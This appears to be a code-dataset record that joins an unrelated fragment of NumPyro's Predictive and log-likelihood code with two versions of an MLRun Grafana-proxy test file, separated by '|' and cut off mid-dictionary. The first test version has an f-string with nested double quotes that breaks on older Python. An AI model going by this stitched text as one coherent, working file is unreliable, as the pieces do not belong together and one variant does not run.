assert isinstance(return_sites, (list, tuple, set))
self.model = model
self.posterior_samples = {} if posterior_samples is None else posterior_samples
self.num_samples = num_samples
self.guide = guide
self.params = {} if params is None else params
self.infer_discrete = infer_discrete
self.return_sites = return_sites
self.parallel = parallel
self.batch_ndims = batch_ndims
self._batch_shape = batch_shape
def __call__(self, rng_key, *args, **kwargs):
"""
Returns dict of samples from the predictive distribution. By default, only sample sites not
contained in `posterior_samples` are returned. This can be modified by changing the
`return_sites` keyword argument of this :class:`Predictive` instance.
:param jax.random.PRNGKey rng_key: random key to draw samples.
:param args: model arguments.
:param kwargs: model kwargs.
"""
posterior_samples = self.posterior_samples
if self.guide is not None:
rng_key, guide_rng_key = random.split(rng_key)
# use return_sites='' as a special signal to return all sites
guide = substitute(self.guide, self.params)
posterior_samples = _predictive(
guide_rng_key,
guide,
posterior_samples,
self._batch_shape,
return_sites="",
parallel=self.parallel,
model_args=args,
model_kwargs=kwargs,
)
model = substitute(self.model, self.params)
return _predictive(
rng_key,
model,
posterior_samples,
self._batch_shape,
return_sites=self.return_sites,
infer_discrete=self.infer_discrete,
parallel=self.parallel,
model_args=args,
model_kwargs=kwargs,
)
def log_likelihood(
model, posterior_samples, *args, parallel=False, batch_ndims=1, **kwargs
):
"""
(EXPERIMENTAL INTERFACE) Returns log likelihood at observation nodes of model,
given samples of all latent variables.
:param model: Python callable containing Pyro primitives.
:param dict posterior_samples: dictionary of samples from the posterior.
:param args: model arguments.
:param batch_ndims: the number of batch dimensions in posterior samples. Some usages:
+ set `batch_ndims=0` to get log likelihoods for 1 single sample
+ set `batch_ndims=1` to get log likelihoods for `posterior_samples`
with shapes `(num_samples x ...)`
+ set `batch_ndims=2` to get log likelihoods for `posterior_samples`
with shapes `(num_chains x num_samples x ...)`
:param kwargs: model kwargs.
:return: dict of log likelihoods at observation sites.
"""
def single_loglik(samples):
substituted_model = (
substitute(model, samples) if isinstance(samples, dict) else model
)
model_trace = trace(substituted_model).get_trace(*args, **kwargs)
return {
name: site["fn"].log_prob(site["value"])
for name, site in model_trace.items()
if site["type"] == "sample" and site["is_observed"]
}
prototype_site = batch_shape = None
for name, sample in posterior_samples.items():
if batch_shape is not None and jnp.shape(sample)[:batch_ndims] != batch_shape:
raise ValueError(
f"Batch shapes at site {name} and {prototype_site} "
f"should be the same, but got "
f"{sample.shape[:batch_ndims]} and {batch_shape}"
)
else:
prototype_site = name
batch_shape = jnp.shape(sample)[:batch_ndims]
if batch_shape is None: # posterior_samples is an empty dict
batch_shape = (1,) * batch_ndims
posterior_samples = np.zeros(batch_shape)
batch_size = int(np.prod(batch_shape))
chunk_size = batch_size if parallel else 1
return soft_vmap(single_loglik, posterior_samples, len(batch_shape), chunk_size)
@contextmanager
def helpful_support_errors(site, raise_warnings=False):
name = site["name"]
support = getattr(site["fn"], "support", None)
if isinstance(support, constraints.independent):
support = support.base_constraint
# Warnings
if raise_warnings:
if support is constraints.circular:
msg = (
f"Continuous inference poorly handles circular sample site '{name}'. "
+ "Consider using VonMises distribution together with "
+ "a reparameterizer, e.g. "
+ f"numpyro.handlers.reparam(config={{'{name}': CircularReparam()}})."
)
warnings.warn(msg, UserWarning)
# Exceptions
try:
yield
except NotImplementedError as e:
support_name = repr(support).lower()
if "integer" in support_name or "boolean" in support_name:
# TODO: mention enumeration when it is supported in SVI
raise ValueError(
f"Continuous inference cannot handle discrete sample site '{name}'."
)
if "sphere" in support_name:
raise ValueError(
f"Continuous inference cannot handle spherical sample site '{name}'. "
"Consider using ProjectedNormal distribution together with "
"a reparameterizer, e.g. "
f"numpyro.handlers.reparam(config={{'{name}': ProjectedNormalReparam()}})."
)
raise e from None
|
import os
from datetime import datetime, timedelta
from random import randint
from typing import Optional
import pandas as pd
import pytest
from fastapi.testclient import TestClient
from pytest import fail
from sqlalchemy.orm import Session
from v3io.dataplane import RaiseForStatus
from v3io_frames import CreateError
from v3io_frames import frames_pb2 as fpb2
from mlrun.api.api.endpoints.grafana_proxy import (
_parse_query_parameters,
_validate_query_parameters,
)
from mlrun.api.crud.model_endpoints import (
ENDPOINTS,
EVENTS,
ModelEndpoints,
write_endpoint_to_kv,
)
from mlrun.config import config
from mlrun.errors import MLRunBadRequestError
from mlrun.utils.model_monitoring import parse_model_endpoint_store_prefix
from mlrun.utils.v3io_clients import get_frames_client, get_v3io_client
from tests.api.api.test_model_endpoints import _mock_random_endpoint
ENV_PARAMS = {"V3IO_ACCESS_KEY", "V3IO_API", "V3IO_FRAMESD"}
TEST_PROJECT = "test3"
def _build_skip_message():
return f"One of the required environment params is not initialized ({", ".join(ENV_PARAMS)})"
def _is_env_params_dont_exist() -> bool:
return not all((os.environ.get(r, False) for r in ENV_PARAMS))
def test_grafana_proxy_model_endpoints_check_connection(
db: Session, client: TestClient
):
response = client.get(
url="/api/grafana-proxy/model-endpoints",
headers={"X-V3io-Session-Key": "fake-access-key"},
)
assert response.status_code == 200
@pytest.mark.skipif(
_is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_list_endpoints(db: Session, client: TestClient):
endpoints_in = [_mock_random_endpoint("active") for _ in range(5)]
for endpoint in endpoints_in:
write_endpoint_to_kv(_get_access_key(), endpoint)
response = client.post(
url="/api/grafana-proxy/model-endpoints/query",
headers={"X-V3io-Session-Key": _get_access_key()},
json={
"targets": [
{"target": f"project={TEST_PROJECT};target_endpoint=list_endpoints"}
]
},
)
response_json = response.json()
if not response_json:
fail(f"Empty response, expected list of dictionaries. {response_json}")
response_json = response_json[0]
if not response_json:
fail(
f"Empty dictionary, expected dictionary with 'columns', 'rows' and 'type' fields. {response_json}"
)
if "columns" not in response_json:
fail(f"Missing 'columns' key in response dictionary. {response_json}")
if "rows" not in response_json:
fail(f"Missing 'rows' key in response dictionary. {response_json}")
if "type" not in response_json:
fail(f"Missing 'type' key in response dictionary. {response_json}")
assert len(response_json["rows"]) == 5
@pytest.mark.skipif(
_is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_individual_feature_analysis(db: Session, client: TestClient):
endpoint_data = {
"timestamp": "2021-02-28 21:02:58.642108",
"project": TEST_PROJECT,
"model": "test-model",
"function": "v2-model-server",
"tag": "latest",
"model_class": "ClassifierModel",
"endpoint_id": "test.test_id",
"labels": "null",
"latency_avg_1s": 42427.0,
"predictions_per_second_count_1s": 141,
"first_request": "2021-02-28 21:02:58.642108",
"last_request": "2021-02-28 21:02:58.642108",
"error_count": 0,
"feature_names": '["sepal length (cm)", "sepal width (cm)", "petal length (cm)", "petal width (cm)"]',
"feature_stats": '{"sepal length (cm)": {"count": 30, "mean": 5.946666666666668, "std": 0.8394305678023165, "min": 4.7, "max": 7.9, "hist": [[4, 4, 4, 4, 4, 3, 4, 0, 3, 4, 1, 1, 2, 1, 0, 1, 0, 0, 1, 1], [4.7, 4.86, 5.0200000000000005, 5.18, 5.34, 5.5, 5.66, 5.82, 5.98, 6.140000000000001, 6.300000000000001, 6.46, 6.62, 6.78, 6.94, 7.1, 7.26, 7.42, 7.58, 7.74, 7.9]]}, "sepal width (cm)": {"count": 30, "mean": 3.119999999999999, "std": 0.4088672324766359, "min": 2.2, "max": 3.8, "hist": [[1, 1, 1, 1, 1, 1, 1, 1, 2, 0, 3, 3, 2, 2, 0, 3, 1, 1, 0, 4], [2.2, 2.2800000000000002, 2.3600000000000003, 2.44, 2.52, 2.6, 2.68, 2.7600000000000002, 2.84, 2.92, 3, 3.08, 3.16, 3.24, 3.3200000000000003, 3.4, 3.48, 3.56, 3.6399999999999997, 3.7199999999999998, 3.8]]}, "petal length (cm)": {"count": 30, "mean": 3.863333333333333, "std": 1.8212317418360753, "min": 1.3, "max": 6.7, "hist": [[6, 6, 6, 6, 6, 6, 0, 0, 1, 2, 0, 3, 3, 2, 2, 3, 1, 1, 1, 1], [1.3, 1.57, 1.84, 2.1100000000000003, 2.38, 2.6500000000000004, 2.92, 3.1900000000000004, 3.46, 3.7300000000000004, 4, 4.2700000000000005, 4.54, 4.8100000000000005, 5.08, 5.3500000000000005, 5.62, 5.89, 6.16, 6.430000000000001, 6.7]]}, "petal width (cm)": {"count": 30, "mean": 1.2733333333333334, "std": 0.8291804567674381, "min": 0.1, "max": 2.5, "hist": [[5, 5, 5, 5, 5, 5, 0, 0, 1, 2, 3, 2, 1, 0, 2, 3, 1, 1, 0, 4], [0.1, 0.22, 0.33999999999999997, 0.45999999999999996, 0.58, 0.7, 0.82, 0.94, 1.06, 1.1800000000000002, 1.3, 1.42, 1.54, 1.6600000000000001, 1.78, 1.9, 2.02, 2.14, 2.2600000000000002, 2.38, 2.5]]}}', # noqa
"current_stats": '{"petal length (cm)": {"count": 100.0, "mean": 2.861, "std": 1.4495485190537463, "min": 1.0, "max": 5.1, "hist": [[4, 20, 20, 4, 2, 0, 0, 0, 0, 1, 0, 2, 3, 2, 8, 7, 6, 10, 7, 4], [1.0, 1.205, 1.41, 1.615, 1.8199999999999998, 2.025, 2.23, 2.4349999999999996, 2.6399999999999997, 2.8449999999999998, 3.05, 3.255, 3.46, 3.665, 3.8699999999999997, 4.074999999999999, 4.279999999999999, 4.484999999999999, 4.6899999999999995, 4.895, 5.1]]}, "petal width (cm)": {"count": 100.0, "mean": 5.471000000000001, "std": 0.6416983463254116, "min": 4.3, "max": 7.0, "hist": [[4, 1, 6, 5, 5, 19, 4, 1, 13, 5, 7, 6, 4, 4, 5, 2, 1, 5, 1, 2], [4.3, 4.435, 4.57, 4.705, 4.84, 4.975, 5.109999999999999, 5.245, 5.38, 5.515, 5.65, 5.785, 5.92, 6.055, 6.1899999999999995, 6.325, 6.46, 6.595, 6.73, 6.865, 7.0]]}, "sepal length (cm)": {"count": 100.0, "mean": 0.7859999999999998, "std": 0.5651530587354012, "min": 0.1, "max": 1.8, "hist": [[5, 29, 7, 7, 1, 1, 0, 0, 0, 0, 7, 3, 5, 0, 13, 7, 10, 3, 1, 1], [0.1, 0.185, 0.27, 0.355, 0.43999999999999995, 0.5249999999999999, 0.61, 0.695, 0.7799999999999999, 0.8649999999999999, 0.9499999999999998, 1.035, 1.12, 1.205, 1.29, 1.375, 1.46, 1.545, 1.63, 1.7149999999999999, 1.8]]}, "sepal width (cm)": {"count": 100.0, "mean": 3.0989999999999998, "std": 0.4787388735948953, "min": 2.0, "max": 4.4, "hist": [[1, 2, 4, 3, 4, 8, 6, 8, 14, 7, 11, 10, 6, 3, 7, 2, 1, 1, 1, 1], [2.0, 2.12, 2.24, 2.3600000000000003, 2.48, 2.6, 2.72, 2.8400000000000003, 2.96, 3.08, 3.2, 3.3200000000000003, 3.4400000000000004, 3.5600000000000005, 3.6800000000000006, 3.8000000000000003, 3.9200000000000004, 4.040000000000001, 4.16, 4.28, 4.4]]}}', # noqa
"drift_measures": '{"petal width (cm)": {"tvd": 0.4, "hellinger": 0.38143130942893605, "kld": 1.3765624725652992}, "tvd_sum": 1.755886699507389, "tvd_mean": 0.43897167487684724, "hellinger_sum": 1.7802062191831514, "hellinger_mean": 0.44505155479578784, "kld_sum": 9.133613874253776, "kld_mean": 2.283403468563444, "sepal width (cm)": {"tvd": 0.3551724137931034, "hellinger": 0.4024622641158891, "kld": 1.7123635755188409}, "petal length (cm)": {"tvd": 0.445, "hellinger": 0.39975075965755447, "kld": 1.6449612084377268}, "sepal length (cm)": {"tvd": 0.5557142857142856, "hellinger": 0.5965618859807716, "kld": 4.399726617731908}}', # noqa
}
v3io = get_v3io_client(endpoint=config.v3io_api, access_key=_get_access_key())
v3io.kv.put(
container="projects",
table_path=f"{TEST_PROJECT}/model-endpoints/endpoints",
key="test.test_id",
attributes=endpoint_data,
)
response = client.post(
url="/api/grafana-proxy/model-endpoints/query",
headers={"X-V3io-Session-Key": _get_access_key()},
json={
"targets": [
{
"target": f"project={TEST_PROJECT};endpoint_id=test.test_id;target_endpoint=individual_feature_analysis" # noqa
}
]
},
)
assert response.status_code == 200
response_json = response.json()
assert len(response_json) == 1
assert "columns" in response_json[0]
assert "rows" in response_json[0]
assert len(response_json[0]["rows"]) == 4
@pytest.mark.skipif(
_is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_individual_feature_analysis_missing_field_doesnt_fail(
db: Session, client: TestClient
):
endpoint_data = {
"timestamp": "2021-02-28 21:02:58.642108",
"project": TEST_PROJECT,
"model": "test-model",
"function": "v2-model-server",
"tag": "latest",
"model_class": "ClassifierModel",
"endpoint_id": "test.test_id",
"labels": "null",
"latency_avg_1s": 42427.0,
"predictions_per_second_count_1s": 141,
"first_request": "2021-02-28 21:02:58.642108",
"last_request": "2021-02-28 21:02:58.642108",
"error_count": 0,
"feature_names": '["sepal length (cm)", "sepal width (cm)", "petal length (cm)", "petal width (cm)"]',
"feature_stats": '{"sepal length (cm)": {"count": 30, "mean": 5.946666666666668, "std": 0.8394305678023165, "min": 4.7, "max": 7.9, "hist": [[4, 4, 4, 4, 4, 3, 4, 0, 3, 4, 1, 1, 2, 1, 0, 1, 0, 0, 1, 1], [4.7, 4.86, 5.0200000000000005, 5.18, 5.34, 5.5, 5.66, 5.82, 5.98, 6.140000000000001, 6.300000000000001, 6.46, 6.62, 6.78, 6.94, 7.1, 7.26, 7.42, 7.58, 7.74, 7.9]]}, "sepal width (cm)": {"count": 30, "mean": 3.119999999999999, "std": 0.4088672324766359, "min": 2.2, "max": 3.8, "hist": [[1, 1, 1, 1, 1, 1, 1, 1, 2, 0, 3, 3, 2, 2, 0, 3, 1, 1, 0, 4], [2.2, 2.2800000000000002, 2.3600000000000003, 2.44, 2.52, 2.6, 2.68, 2.7600000000000002, 2.84, 2.92, 3, 3.08, 3.16, 3.24, 3.3200000000000003, 3.4, 3.48, 3.56, 3.6399999999999997, 3.7199999999999998, 3.8]]}, "petal length (cm)": {"count": 30, "mean": 3.863333333333333, "std": 1.8212317418360753, "min": 1.3, "max": 6.7, "hist": [[6, 6, 6, 6, 6, 6, 0, 0, 1, 2, 0, 3, 3, 2, 2, 3, 1, 1, 1, 1], [1.3, 1.57, 1.84, 2.1100000000000003, 2.38, 2.6500000000000004, 2.92, 3.1900000000000004, 3.46, 3.7300000000000004, 4, 4.2700000000000005, 4.54, 4.8100000000000005, 5.08, 5.3500000000000005, 5.62, 5.89, 6.16, 6.430000000000001, 6.7]]}, "petal width (cm)": {"count": 30, "mean": 1.2733333333333334, "std": 0.8291804567674381, "min": 0.1, "max": 2.5, "hist": [[5, 5, 5, 5, 5, 5, 0, 0, 1, 2, 3, 2, 1, 0, 2, 3, 1, 1, 0, 4], [0.1, 0.22, 0.33999999999999997, 0.45999999999999996, 0.58, 0.7, 0.82, 0.94, 1.06, 1.1800000000000002, 1.3, 1.42, 1.54, 1.6600000000000001, 1.78, 1.9, 2.02, 2.14, 2.2600000000000002, 2.38, 2.5]]}}', # noqa
"drift_measures": '{"petal width (cm)": {"tvd": 0.4, "hellinger": 0.38143130942893605, "kld": 1.3765624725652992}, "tvd_sum": 1.755886699507389, "tvd_mean": 0.43897167487684724, "hellinger_sum": 1.7802062191831514, "hellinger_mean": 0.44505155479578784, "kld_sum": 9.133613874253776, "kld_mean": 2.283403468563444, "sepal width (cm)": {"tvd": 0.3551724137931034, "hellinger": 0.4024622641158891, "kld": 1.7123635755188409}, "petal length (cm)": {"tvd": 0.445, "hellinger": 0.39975075965755447, "kld": 1.6449612084377268}, "sepal length (cm)": {"tvd": 0.5557142857142856, "hellinger": 0.5965618859807716, "kld": 4.399726617731908}}', # noqa
}
v3io = get_v3io_client(endpoint=config.v3io_api, access_key=_get_access_key())
v3io.kv.put(
container="projects",
table_path=f"{TEST_PROJECT}/model-endpoints/endpoints",
key="test.test_id",
attributes=endpoint_data,
)
response = client.post(
url="/api/grafana-proxy/model-endpoints/query",
headers={"X-V3io-Session-Key": _get_access_key()},
json={
"targets": [
{
"target": f"project={TEST_PROJECT};endpoint_id=test.test_id;target_endpoint=individual_feature_analysis" # noqa
}
]
},
)
assert response.status_code == 200
response_json = response.json()
assert len(response_json) == 1
assert "columns" in response_json[0]
assert "rows" in response_json[0]
assert len(response_json[0]["rows"]) == 4
for row in response_json[0]["rows"]:
assert row[0] is not None
assert all(map(lambda e: e is None, row[1:4]))
assert all(map(lambda e: e is not None, row[4:10]))
@pytest.mark.skipif(
_is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_overall_feature_analysis(db: Session, client: TestClient):
endpoint_data = {
"timestamp": "2021-02-28 21:02:58.642108",
"project": TEST_PROJECT,
"model": "test-model",
"function": "v2-model-server",
"tag": "latest",
"model_class": "ClassifierModel",
"endpoint_id": "test.test_id",
"labels": "null",
"latency_avg_1s": 42427.0,
"predictions_per_second_count_1s": 141,
"first_request": "2021-02-28 21:02:58.642108",
"last_request": "2021-02-28 21:02:58.642108",
"error_count": 0,
"feature_names": '["sepal length (cm)", "sepal width (cm)", "petal length (cm)", "petal width (cm)"]',
"feature_stats": '{"sepal length (cm)": {"count": 30, "mean": 5.946666666666668, "std": 0.8394305678023165, "min": 4.7, "max": 7.9, "hist": [[4, 4, 4, 4, 4, 3, 4, 0, 3, 4, 1, 1, 2, 1, 0, 1, 0, 0, 1, 1], [4.7, 4.86, 5.0200000000000005, 5.18, 5.34, 5.5, 5.66, 5.82, 5.98, 6.140000000000001, 6.300000000000001, 6.46, 6.62, 6.78, 6.94, 7.1, 7.26, 7.42, 7.58, 7.74, 7.9]]}, "sepal width (cm)": {"count": 30, "mean": 3.119999999999999, "std": 0.4088672324766359, "min": 2.2, "max": 3.8, "hist": [[1, 1, 1, 1, 1, 1, 1, 1, 2, 0, 3, 3, 2, 2, 0, 3, 1, 1, 0, 4], [2.2, 2.2800000000000002, 2.3600000000000003, 2.44, 2.52, 2.6, 2.68, 2.7600000000000002, 2.84, 2.92, 3, 3.08, 3.16, 3.24, 3.3200000000000003, 3.4, 3.48, 3.56, 3.6399999999999997, 3.7199999999999998, 3.8]]}, "petal length (cm)": {"count": 30, "mean": 3.863333333333333, "std": 1.8212317418360753, "min": 1.3, "max": 6.7, "hist": [[6, 6, 6, 6, 6, 6, 0, 0, 1, 2, 0, 3, 3, 2, 2, 3, 1, 1, 1, 1], [1.3, 1.57, 1.84, 2.1100000000000003, 2.38, 2.6500000000000004, 2.92, 3.1900000000000004, 3.46, 3.7300000000000004, 4, 4.2700000000000005, 4.54, 4.8100000000000005, 5.08, 5.3500000000000005, 5.62, 5.89, 6.16, 6.430000000000001, 6.7]]}, "petal width (cm)": {"count": 30, "mean": 1.2733333333333334, "std": 0.8291804567674381, "min": 0.1, "max": 2.5, "hist": [[5, 5, 5, 5, 5, 5, 0, 0, 1, 2, 3, 2, 1, 0, 2, 3, 1, 1, 0, 4], [0.1, 0.22, 0.33999999999999997, 0.45999999999999996, 0.58, 0.7, 0.82, 0.94, 1.06, 1.1800000000000002, 1.3, 1.42, 1.54, 1.6600000000000001, 1.78, 1.9, 2.02, 2.14, 2.2600000000000002, 2.38, 2.5]]}}', # noqa
"drift_measures": '{"petal width (cm)": {"tvd": 0.4, "hellinger": 0.38143130942893605, "kld": 1.3765624725652992}, "tvd_sum": 1.755886699507389, "tvd_mean": 0.43897167487684724, "hellinger_sum": 1.7802062191831514, "hellinger_mean": 0.44505155479578784, "kld_sum": 9.133613874253776, "kld_mean": 2.283403468563444, "sepal width (cm)": {"tvd": 0.3551724137931034, "hellinger": 0.4024622641158891, "kld": 1.7123635755188409}, "petal length (cm)": {"tvd": 0.445, "hellinger": 0.39975075965755447, "kld": 1.6449612084377268}, "sepal length (cm)": {"tvd": 0.5557142857142856, "hellinger": 0.5965618859807716, "kld": 4.399726617731908}}', # noqa
}
v3io = get_v3io_client(endpoint=config.v3io_api, access_key=_get_access_key())
v3io.kv.put(
container="projects",
table_path=f"{TEST_PROJECT}/model-endpoints/endpoints",
key="test.test_id",
attributes=endpoint_data,
)
response = client.post(
url="/api/grafana-proxy/model-endpoints/query",
headers={"X-V3io-Session-Key": _get_access_key()},
json={
"targets": [
{
"target": f"project={TEST_PROJECT};endpoint_id=test.test_id;target_endpoint=overall_feature_analysis" # noqa
}
]
},
)
assert response.status_code == 200
response_json = response.json()
assert len(response_json) == 1
assert "columns" in response_json[0]
assert "rows" in response_json[0]
assert len(response_json[0]["rows"][0]) == 6
def test_parse_query_parameters_failure():
# No 'targets' in body
with pytest.raises(MLRunBadRequestError):
_parse_query_parameters({})
# No 'target' list in 'targets' dictionary
with pytest.raises(MLRunBadRequestError):
_parse_query_parameters({"targets": []})
# Target query not separated by equals ('=') char
with pytest.raises(MLRunBadRequestError):
_parse_query_parameters({"targets": [{"target": "test"}]})
def test_parse_query_parameters_success():
# Target query separated by equals ('=') char
params = _parse_query_parameters({"targets": [{"target": "test=some_test"}]})
assert params["test"] == "some_test"
# Target query separated by equals ('=') char (multiple queries)
params = _parse_query_parameters(
{"targets": [{"target": "test=some_test;another_test=some_other_test"}]}
)
assert params["test"] == "some_test"
assert params["another_test"] == "some_other_test"
params = _parse_query_parameters(
{"targets": [{"target": "test=some_test;another_test=some_other_test;"}]}
)
assert params["test"] == "some_test"
assert params["another_test"] == "some_other_test"
def test_validate_query_parameters_failure():
# No 'target_endpoint' in query parameters
with pytest.raises(MLRunBadRequestError):
_validate_query_parameters({})
# target_endpoint unsupported
with pytest.raises(MLRunBadRequestError):
_validate_query_parameters(
{"target_endpoint": "unsupported_endpoint"}, {"supported_endpoint"}
)
def test_validate_query_parameters_success():
_validate_query_parameters(
{"target_endpoint": "list_endpoints"}, {"list_endpoints"}
)
def _get_access_key() -> Optional[str]:
return os.environ.get("V3IO_ACCESS_KEY")
@pytest.fixture(autouse=True)
def cleanup_endpoints(db: Session, client: TestClient):
if not _is_env_params_dont_exist():
kv_path = config.model_endpoint_monitoring.store_prefixes.default.format(
project=TEST_PROJECT, kind=ENDPOINTS
)
_, kv_container, kv_path = parse_model_endpoint_store_prefix(kv_path)
tsdb_path = config.model_endpoint_monitoring.store_prefixes.default.format(
project=TEST_PROJECT, kind=EVENTS
)
_, tsdb_container, tsdb_path = parse_model_endpoint_store_prefix(tsdb_path)
v3io = get_v3io_client(endpoint=config.v3io_api, access_key=_get_access_key())
frames = get_frames_client(
token=_get_access_key(),
container=tsdb_container,
address=config.v3io_framesd,
)
try:
all_records = v3io.kv.new_cursor(
container=kv_container,
table_path=kv_path,
raise_for_status=RaiseForStatus.never,
).all()
all_records = [r["__name"] for r in all_records]
# Cleanup KV
for record in all_records:
v3io.kv.delete(
container=kv_container,
table_path=kv_path,
key=record,
raise_for_status=RaiseForStatus.never,
)
except RuntimeError:
pass
try:
# Cleanup TSDB
frames.delete(
backend="tsdb", table=tsdb_path, if_missing=fpb2.IGNORE,
)
except CreateError:
pass
@pytest.mark.skipif(
_is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_incoming_features(db: Session, client: TestClient):
path = config.model_endpoint_monitoring.store_prefixes.default.format(
project=TEST_PROJECT, kind=EVENTS
)
_, container, path = parse_model_endpoint_store_prefix(path)
frames = get_frames_client(
token=_get_access_key(), container=container, address=config.v3io_framesd,
)
frames.create(backend="tsdb", table=path, rate="10/m", if_exists=1)
start = datetime.utcnow()
endpoints = [_mock_random_endpoint() for _ in range(5)]
for e in endpoints:
e.spec.feature_names = ["f0", "f1", "f2", "f3"]
for endpoint in endpoints:
ModelEndpoints.create_or_patch(_get_access_key(), endpoint)
total = 0
dfs = []
for i in range(10):
count = randint(1, 10)
total += count
data = {
"f0": i,
"f1": i + 1,
"f2": i + 2,
"f3": i + 3,
"endpoint_id": endpoint.metadata.uid,
"timestamp": start - timedelta(minutes=10 - i),
}
df = pd.DataFrame(data=[data])
dfs.append(df)
frames.write(
backend="tsdb",
table=path,
dfs=dfs,
index_cols=["timestamp", "endpoint_id"],
)
for endpoint in endpoints:
response = client.post(
url="/api/grafana-proxy/model-endpoints/query",
headers={"X-V3io-Session-Key": _get_access_key()},
json={
"targets": [
{
"target": f"project={TEST_PROJECT};endpoint_id={endpoint.metadata.uid};target_endpoint=incoming_features" # noqa
}
]
},
)
response = response.json()
targets = [t["target"] for t in response]
assert targets == ["f0", "f1", "f2", "f3"]
lens = [t["datapoints"] for t in response]
assert all(map(lambda l: len(l) == 10, lens))
| import os
from datetime import datetime, timedelta
from random import randint
from typing import Optional
import pandas as pd
import pytest
from fastapi.testclient import TestClient
from pytest import fail
from sqlalchemy.orm import Session
from v3io.dataplane import RaiseForStatus
from v3io_frames import CreateError
from v3io_frames import frames_pb2 as fpb2
from mlrun.api.api.endpoints.grafana_proxy import (
_parse_query_parameters,
_validate_query_parameters,
)
from mlrun.api.crud.model_endpoints import (
ENDPOINTS,
EVENTS,
ModelEndpoints,
write_endpoint_to_kv,
)
from mlrun.config import config
from mlrun.errors import MLRunBadRequestError
from mlrun.utils.model_monitoring import parse_model_endpoint_store_prefix
from mlrun.utils.v3io_clients import get_frames_client, get_v3io_client
from tests.api.api.test_model_endpoints import _mock_random_endpoint
ENV_PARAMS = {"V3IO_ACCESS_KEY", "V3IO_API", "V3IO_FRAMESD"}
TEST_PROJECT = "test3"
def _build_skip_message():
return f"One of the required environment params is not initialized ({', '.join(ENV_PARAMS)})"
def _is_env_params_dont_exist() -> bool:
return not all((os.environ.get(r, False) for r in ENV_PARAMS))
def test_grafana_proxy_model_endpoints_check_connection(
db: Session, client: TestClient
):
response = client.get(
url="/api/grafana-proxy/model-endpoints",
headers={"X-V3io-Session-Key": "fake-access-key"},
)
assert response.status_code == 200
@pytest.mark.skipif(
_is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_list_endpoints(db: Session, client: TestClient):
endpoints_in = [_mock_random_endpoint("active") for _ in range(5)]
for endpoint in endpoints_in:
write_endpoint_to_kv(_get_access_key(), endpoint)
response = client.post(
url="/api/grafana-proxy/model-endpoints/query",
headers={"X-V3io-Session-Key": _get_access_key()},
json={
"targets": [
{"target": f"project={TEST_PROJECT};target_endpoint=list_endpoints"}
]
},
)
response_json = response.json()
if not response_json:
fail(f"Empty response, expected list of dictionaries. {response_json}")
response_json = response_json[0]
if not response_json:
fail(
f"Empty dictionary, expected dictionary with 'columns', 'rows' and 'type' fields. {response_json}"
)
if "columns" not in response_json:
fail(f"Missing 'columns' key in response dictionary. {response_json}")
if "rows" not in response_json:
fail(f"Missing 'rows' key in response dictionary. {response_json}")
if "type" not in response_json:
fail(f"Missing 'type' key in response dictionary. {response_json}")
assert len(response_json["rows"]) == 5
@pytest.mark.skipif(
_is_env_params_dont_exist(), reason=_build_skip_message(),
)
def test_grafana_individual_feature_analysis(db: Session, client: TestClient):
endpoint_data = {
"timestamp": "2021-02-28 21:02:58.642108",
"project": TEST_PROJECT,
"model": "test-model",
"function": "v2-model-server",
"tag": "latest",
"model_class": "ClassifierModel",
"endpoint_id": "test.test_id",
"labels": "null",
"latency_avg_1s": 42427.0,
"predictions_per_second_count_1s": 141,
"first_request": "2021-02-28 21:02:58.642108",
"last_request": "2021-02-28 21:02:58.642108",
"error_count": 0,
"feature_names": '["sepal length (cm)", "sepal width (cm)", "petal length (cm)", "petal width (cm)"]',
"feature_stats": '{"sepal length (cm)": {"count": 30, "mean": 5.946666666666668, "std": 0.8394305678023165, "min": 4.7, "max": 7.9, "hist": [[4, 4, 4, 4, 4, 3, 4, 0, 3, 4, 1, 1, 2, 1, 0, 1, 0, 0, 1, 1], [4.7, 4.86, 5.0200000000000005, 5.18, 5.34, 5.5, 5.66, 5.82, 5.98, 6.140000000000001, 6.300000000000001, 6.46, 6.62, 6.78, 6.94, 7.1, 7.26, 7.42, 7.58, 7.74, 7.9]]}, "sepal width (cm)": {"count": 30, "mean": 3.119999999999999, "std": 0.4088672324766359, "min": 2.2, "max": 3.8, "hist": [[1, 1, 1, 1, 1, 1, 1, 1, 2, 0, 3, 3, 2, 2, 0, 3, 1, 1, 0, 4], [2.2, 2.2800000000000002, 2.3600000000000003, 2.44, 2.52, 2.6, 2.68, 2.7600000000000002, 2.84, 2.92, 3, 3.08, 3.16, 3.24, 3.3200000000000003, 3.4, 3.48, 3.56, 3.6399999999999997, 3.7199999999999998, 3.8]]}, "petal length (cm)": {"count": 30, "mean": 3.863333333333333, "std": 1.8212317418360753, "min": 1.3, "max": 6.7, "hist": [[6, 6, 6, 6, 6, 6, 0, 0, 1, 2, 0, 3, 3, 2, 2, 3, 1, 1, 1, 1], [1.3, 1.57, 1.84, 2.1100000000000003, 2.38, 2.6500000000000004, 2.92, 3.1900000000000004, 3.46, 3.7300000000000004, 4, 4.2700000000000005, 4.54, 4.8100000000000005, 5.08, 5.3500000000000005, 5.62, 5.89, 6.16, 6.430000000000001, 6.7]]}, "petal width (cm)": {"count": 30, "mean": 1.2733333333333334, "std": 0.8291804567674381, "min": 0.1, "max": 2.5, "hist": [[5, 5, 5, 5, 5, 5, 0, 0, 1, 2, 3, 2, 1, 0, 2, 3, 1, 1, 0, 4], [0.1, 0.22, 0.33999999999999997, 0.45999999999999996, 0.58, 0.7, 0.82, 0.94, 1.06, 1.1800000000000002, 1.3, 1.42, 1.54, 1.6600000000000001, 1.78, 1.9, 2.02, 2.14, 2.2600000000000002, 2.38, 2.5]]}}', # noqa
